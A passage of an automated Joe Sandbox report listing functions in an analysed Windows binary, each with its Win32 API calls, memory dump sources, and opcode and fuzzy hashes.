                                                                                                                                                  • GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C4B956
                                                                                                                                                  • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C4B96E
                                                                                                                                                  • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C4B992
                                                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4B9AD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                                  • Opcode ID: fdcf37bd88434f09161bf1b2ea5074c81bd33db148b8924ab2c19234dfc9c01d
                                                                                                                                                  • Instruction ID: 0fd3373a455d900d432e07b9ff91560ddd06247961f1b402e2bd73032ac56a94
                                                                                                                                                  • Opcode Fuzzy Hash: fdcf37bd88434f09161bf1b2ea5074c81bd33db148b8924ab2c19234dfc9c01d
                                                                                                                                                  • Instruction Fuzzy Hash: 3C1144B9D04209EFDB41CF98C984AEEBBF9FF58311F104156E914E3610D735AA658F50
                                                                                                                                                  Function 00C4BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C4BCB6
                                                                                                                                                  • _memset.LIBCMT ref: 00C4BCC5
                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C88F20,00C88F64), ref: 00C4BCF4
                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00C4BD06
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3277943733-0
                                                                                                                                                  • Opcode ID: a6e9de76e69c3aa377a4be19a1b633fc30ab1981ee8e449539304037561bba8d
                                                                                                                                                  • Instruction ID: d3d0bd14e242807d4486162bbac0842f2d632985f699aacb9dac556d4ff78da3
                                                                                                                                                  • Opcode Fuzzy Hash: a6e9de76e69c3aa377a4be19a1b633fc30ab1981ee8e449539304037561bba8d
                                                                                                                                                  • Instruction Fuzzy Hash: CEF05EF2540304BFE65067A1AC09FBF3A9DEF08755F400461BB08E65A6DB714D1487AC
                                                                                                                                                  Function 00C27195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C271A1
                                                                                                                                                    • Part of subcall function 00C27C7F: _memset.LIBCMT ref: 00C27CB4
                                                                                                                                                  • _memmove.LIBCMT ref: 00C271C4
                                                                                                                                                  • _memset.LIBCMT ref: 00C271D1
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C271E1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 48991266-0
                                                                                                                                                  • Opcode ID: 48b1bd46e862f365015281f8b928bba2b1422b80068fb4f70972f2a0120e5bde
                                                                                                                                                  • Instruction ID: d83f230a0d6372799722256a7f093e04509d970873daaccaa5521c5dc3de5a95
                                                                                                                                                  • Opcode Fuzzy Hash: 48b1bd46e862f365015281f8b928bba2b1422b80068fb4f70972f2a0120e5bde
                                                                                                                                                  • Instruction Fuzzy Hash: DBF0543A101110ABCF016F55EC85B4ABB69EF45321F14C091FE089F22BCB31A951DBB4
                                                                                                                                                  Function 00C4C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC1729
                                                                                                                                                    • Part of subcall function 00BC16CF: SelectObject.GDI32(?,00000000), ref: 00BC1738
                                                                                                                                                    • Part of subcall function 00BC16CF: BeginPath.GDI32(?), ref: 00BC174F
                                                                                                                                                    • Part of subcall function 00BC16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 00BC1778
                                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000,00000000,00000000,000000FF,00000002,00000001,?,?,00C4C4C0,00000000,?,00000008,00000000), ref: 00C4C3E8
                                                                                                                                                  • LineTo.GDI32(00000000,?,?,?,00C4C4C0,00000000,?,00000008,00000000,00000000,?), ref: 00C4C3F5
                                                                                                                                                  • EndPath.GDI32(00000000,?,00C4C4C0,00000000,?,00000008,00000000,00000000,?), ref: 00C4C405
                                                                                                                                                  • StrokePath.GDI32(00000000,?,00C4C4C0,00000000,?,00000008,00000000,00000000,?), ref: 00C4C413
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                                  • Opcode ID: 291b904339e8fb70f4d38f99fa1b13164d3ee7b86ce12aa96aea7cd560b54755
                                                                                                                                                  • Instruction ID: 5bf337de19dfa68aa14033bb183477380b81daf5fe5b3e58df4809dd46d505bb
                                                                                                                                                  • Opcode Fuzzy Hash: 291b904339e8fb70f4d38f99fa1b13164d3ee7b86ce12aa96aea7cd560b54755
                                                                                                                                                  • Instruction Fuzzy Hash: E6F0BE36005218BBDB122F54AC0DFDE3F59AF06312F248140FA51B10E287745A90EBA9
                                                                                                                                                  Function 00C1AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C1AA6F
                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 00C1AA82
                                                                                                                                                  • GetCurrentThreadId.KERNEL32(00000000), ref: 00C1AA89
                                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 00C1AA90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                  • Opcode ID: 57135880a3317d8fc7ea23e264ccf83c019a11a006a26a42f2057b87bcd050ef
                                                                                                                                                  • Instruction ID: b1674f44d526cd1a6421635d109e4de89662c240dee938bfab2bbcfc9a9fca8c
                                                                                                                                                  • Opcode Fuzzy Hash: 57135880a3317d8fc7ea23e264ccf83c019a11a006a26a42f2057b87bcd050ef
                                                                                                                                                  • Instruction Fuzzy Hash: 5CE03931542328BADB215FA29D0CFEB3F1CEF127A2F108011FA09E4050CA728690EBE1
                                                                                                                                                  Function 00BC25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetSysColor.USER32(00000008,00000000), ref: 00BC260D
                                                                                                                                                  • SetTextColor.GDI32(?,000000FF,00000000), ref: 00BC2617
                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00BC262C
                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00BC2634
                                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 00BFC1C4
                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BFC1D1
                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00BFC1EA
                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00BFC203
                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00BFC223
                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFC22E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                                  • Opcode ID: bc63101e1502553c2ec44b3fd5e04d2f5a1a1b875744a55c65e4326b76461fb2
                                                                                                                                                  • Instruction ID: 5b86d029c1352208b8b5b458a6b40e2f14c09cd38394dc9b7f85a921a4f2cd7c
                                                                                                                                                  • Opcode Fuzzy Hash: bc63101e1502553c2ec44b3fd5e04d2f5a1a1b875744a55c65e4326b76461fb2
                                                                                                                                                  • Instruction Fuzzy Hash: B7E06535504748BBDB215F74AC09BED3F51EB05332F1483A6FA69A80E2C77145D4DB12
                                                                                                                                                  Function 00C19330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00C18DB3,?,?,?,00C18F04), ref: 00C19339
                                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C18F04), ref: 00C19340
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C18F04), ref: 00C1934D
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C18F04), ref: 00C19354
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3974789173-0
                                                                                                                                                  • Opcode ID: 928dbf934016cdc3e5e7cc03afdc1e59b45ffe8f11de4074e9ef6958d517daf8
                                                                                                                                                  • Instruction ID: 5d1de375fc5e24af4e5bd48bc53dcc4dd8e0f91186566f79640ff1cd5f5273fa
                                                                                                                                                  • Opcode Fuzzy Hash: 928dbf934016cdc3e5e7cc03afdc1e59b45ffe8f11de4074e9ef6958d517daf8
                                                                                                                                                  • Instruction Fuzzy Hash: 72E04F3A6023119BD7601FB15D0DB9A7B6CEF517A2F204818E645E90A0E6349585C750
                                                                                                                                                  Function 00C00679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00C00679
                                                                                                                                                  • GetDC.USER32(00000000), ref: 00C00683
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C006A3
                                                                                                                                                  • ReleaseDC.USER32(?,?,?,?,?), ref: 00C006C4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                  • Opcode ID: 856b52c57d3f996ad79d77772a84a3f4c7133d685e39c863d35ee1806d116d8b
                                                                                                                                                  • Instruction ID: e0a93bf605c31ce0dc598987be498dd294808307f347be716c5fc82820f3ffa0
                                                                                                                                                  • Opcode Fuzzy Hash: 856b52c57d3f996ad79d77772a84a3f4c7133d685e39c863d35ee1806d116d8b
                                                                                                                                                  • Instruction Fuzzy Hash: 6BE0E579800305EFCB419F60D848B9D7BF5AB88312F218019FC5AE7250DB3885919F50
                                                                                                                                                  Function 00C0068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00C0068D
                                                                                                                                                  • GetDC.USER32(00000000), ref: 00C00697
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C006A3
                                                                                                                                                  • ReleaseDC.USER32(?,?,?,?,?), ref: 00C006C4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                  • Opcode ID: 6c305b2cf19b28ae1964cad614614ec3506206090777fb55dff0033bd09756c9
                                                                                                                                                  • Instruction ID: 2c2f40b51b92221bd1b39fbb473fa6040cbfacf35b6bab23a4d05e67e925d19b
                                                                                                                                                  • Opcode Fuzzy Hash: 6c305b2cf19b28ae1964cad614614ec3506206090777fb55dff0033bd09756c9
                                                                                                                                                  • Instruction Fuzzy Hash: 37E012B9800305AFCB419FA0D848B9E7BF1AB8C312F208018FD5AE7250DB3899918F50
                                                                                                                                                  Function 00C2B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD436A: _wcscpy.LIBCMT ref: 00BD438D
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • __wcsnicmp.LIBCMT ref: 00C2B670
                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C2B739
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                  • String ID: LPT
                                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                                  • Opcode ID: 6a2a7a18b2245e704a230c411dc3bc7a85e1c5a31817ea4524745639ac19e627
                                                                                                                                                  • Instruction ID: 9791f54877ed0eb80ccb56b6e45807ea77f8cdb225756aac6490a6df33d7c3c0
                                                                                                                                                  • Opcode Fuzzy Hash: 6a2a7a18b2245e704a230c411dc3bc7a85e1c5a31817ea4524745639ac19e627
                                                                                                                                                  • Instruction Fuzzy Hash: 27618475A00229EFCB14EF54D891EAEB7F4EF48710F1080A9F556AB791D770AE81CB60
                                                                                                                                                  Function 00BCE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00BCE01E
                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BCE037
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                                                  • Opcode ID: 16fc74a3eadc83be196ca2a16e10d2e6b54dcc93dc1c8c795048fdb32497fe05
                                                                                                                                                  • Instruction ID: dabe62abaea043b55be83b199d07b110ea46a6b2eadcd890013ef0dc7cdb36ad
                                                                                                                                                  • Opcode Fuzzy Hash: 16fc74a3eadc83be196ca2a16e10d2e6b54dcc93dc1c8c795048fdb32497fe05
                                                                                                                                                  • Instruction Fuzzy Hash: AC5158714187449BE320AF50E896BAFBBF8FBC4314F51899DF1D9411A1DB709928CB16
                                                                                                                                                  Function 00C48096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?,?,?,?), ref: 00C48186
                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C4819B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID: '
                                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                                  • Opcode ID: 6d6a54e7f4074439be743125ce3f5f1bcd3feef11ba35fe20cf52a1e00452488
                                                                                                                                                  • Instruction ID: c660b601839e7f61a8b1af9a4741c4f8556833c40598c1bb97cbcec2cdf7bd0b
                                                                                                                                                  • Opcode Fuzzy Hash: 6d6a54e7f4074439be743125ce3f5f1bcd3feef11ba35fe20cf52a1e00452488
                                                                                                                                                  • Instruction Fuzzy Hash: 40410874A012099FDB14CF69C881BDE7BB5FB09300F10016AED14EB391DB71A956CFA0
                                                                                                                                                  Function 00C32C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C32C6A
                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C32CA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                                  • String ID: |
                                                                                                                                                  • API String ID: 1413715105-2343686810
                                                                                                                                                  • Opcode ID: 38ea52f6daa31c708f71e786202e62baa53995285d794a5bbdfc1624d46a516b
                                                                                                                                                  • Instruction ID: abed51c812b00560ada5ad1c21da44d7d81e570bc077f8b26edb60c93f4735b2
                                                                                                                                                  • Opcode Fuzzy Hash: 38ea52f6daa31c708f71e786202e62baa53995285d794a5bbdfc1624d46a516b
                                                                                                                                                  • Instruction Fuzzy Hash: 79311E71C10119BBCF11DFA5DC85AEEBFB9FF08310F100056F815A6262EB315A56DBA4
                                                                                                                                                  Function 00C47088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00C4713C
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C47178
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
